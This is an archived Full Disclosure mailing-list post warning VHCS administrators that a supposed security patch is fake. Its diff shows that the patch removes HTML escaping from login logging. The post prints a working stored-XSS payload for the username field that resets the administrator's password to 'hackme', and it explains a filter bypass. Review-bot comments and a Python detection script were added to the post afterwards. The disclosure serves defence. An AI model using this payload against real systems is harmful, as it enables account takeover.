Full Disclosure mailing list archives
VHCS Security Patch - 2006-02-05 --> Fake!
From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 05 Feb 2006 21:09:11 +0100
Hi,

I've just visited the VHCS main page and noticed the following "security patch":

http://vhcs.net/new/modules/news/article.php?storyid=23

It reads:

"This patch is for all VHCS versions. You have to update only one GUI file - /vhcs2/gui/include/login.php Just replace the file "

Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your VHCS installation vulnerable to a high-severity cross-site-scripting issue! See it:

login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php --> login.php from "security patch"

roman@rs-labs:~$ diff login_orig_unix.php login_new_unix.php 38c38 < write_log("Login error, <b><i>".htmlspecialchars($uname, ENT_QUOTES, "UTF-8")."</i></b> unknown username"); ---
write_log("Login error, <b><i>".$uname."</i></b> unknown
username"); 75c75 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status is not OK - user can not login"); ---
write_log( $uname." Domain status is not OK - user can not login"); 104c104 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user logged in."); ---
write_log( $uname." user logged in.");
112c112 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." bad password login data."); ---
write_log( $uname." bad password login data.");
190c190 < write_log(htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user session timed out"); ---
write_log($uname." user session timed out");
199c199 < write_log(htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." bad session data."); ---
write_log($uname." bad session data.");
258a259
die();
261a263
}
437c439 < } ---
//}
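Review bot: each of the six `c` hunks (38c38, 75c75, 104c104, 112c112, 190c190, 199c199) replaces `htmlspecialchars($uname, ENT_QUOTES, "UTF-8")` with a bare `$uname` in the write_log() argument, so the attacker-supplied username reaches the log without encoding and is rendered as markup wherever the log is displayed; this is the opposite of a security fix and the replacement file should be rejected outright. If encoding is to be touched at all, move it into write_log() itself (or the code that renders the log) so that a later edit of the call sites cannot silently drop it again.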
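Review bot: the remaining hunks (258a259 adds `die();`, 261a263 adds `}`, 437c439 turns `}` into `//}`) restructure control flow: a block is now closed at line 263 and the brace that closed it at line 437 is commented out, with an unconditional `die()` inserted just before. The diff shows no context lines, so it is impossible to tell which block now ends roughly 175 lines early or what code the `die()` cuts off; a change like that in the login handler needs the surrounding code and a stated justification before it can be reviewed, let alone applied.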
roman@rs-labs:~$

As you can see, the "patch" removes htmlspecialchars() calls, leaving login.php vulnerable. Nasty...

If you apply the "patch" (or have an old VHCS install, for instance version <= 2.4.6.2), the XSS bug is active. Just for fun, you can exploit it by entering the following as "username" (in the login entry page):

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script>

When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his password will be set to "hackme" :-) The %61 trick is necessary to bypass some string substitution.

This exploit combines the XSS bug with what I see as a poor security design bug, which is letting users change their password without supplying the old one (Alex, please, fix it in the next release!).

Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply the patch.

--
Cheers,
-Roman

PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
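A check for a candidate login.php, added here as an example and not part of Roman's post or of VHCS: it lists write_log() calls that log $uname without htmlspecialchars(..., ENT_QUOTES, ...) and compares the replacement file against the one it would overwrite, which is exactly how the diff above exposes the fake. The sample sources are constructed from the diff; the check assumes the username variable is named $uname and the logging call is write_log(), as in this file.

```python
import re

# One write_log(...) call; DOTALL so a call wrapped over two lines (as in
# the mail above) is still seen as a single call.
WRITE_LOG_CALL = re.compile(r'write_log\s*\((.*?)\)\s*;', re.DOTALL)
# The encoding the genuine 2.4.7.1 file applies to the user-controlled name.
ESCAPED_UNAME = re.compile(r'htmlspecialchars\s*\(\s*\$uname\s*,\s*ENT_QUOTES\b')


def unescaped_write_log_calls(php_source):
    """Return (line_number, argument) for each write_log() whose argument
    concatenates $uname without htmlspecialchars(..., ENT_QUOTES, ...)."""
    findings = []
    for m in WRITE_LOG_CALL.finditer(php_source):
        arg = m.group(1)
        if '$uname' in arg and not ESCAPED_UNAME.search(arg):
            line_no = php_source.count('\n', 0, m.start()) + 1
            findings.append((line_no, ' '.join(arg.split())))
    return findings


def escaping_removed_by_patch(original_source, patched_source):
    """True when the replacement file logs $uname unencoded in more places
    than the file it replaces, i.e. the 'patch' weakens output encoding."""
    before = len(unescaped_write_log_calls(original_source))
    after = len(unescaped_write_log_calls(patched_source))
    return after > before


# Constructed samples: two of the write_log() lines quoted in the diff above,
# plus one unrelated call that must not be flagged.
ORIGINAL = '''<?php
write_log("Login error, <b><i>".htmlspecialchars($uname, ENT_QUOTES, "UTF-8")."</i></b> unknown username");
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user logged in.");
write_log("session ".$sess_id." closed");
'''
FAKE_PATCH = '''<?php
write_log("Login error, <b><i>".$uname."</i></b> unknown username");
write_log( $uname." user logged in.");
write_log("session ".$sess_id." closed");
'''

if __name__ == '__main__':
    for no, arg in unescaped_write_log_calls(FAKE_PATCH):
        print(f'line {no}: write_log({arg}) logs $uname without encoding')
    verdict = 'REJECT' if escaping_removed_by_patch(ORIGINAL, FAKE_PATCH) else 'ok'
    print(f'patch verdict: {verdict}')
```

Run it with the real original and candidate files read from disk; any non-empty finding list on the candidate, or a REJECT verdict, means the "patch" strips output encoding and must not be installed.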
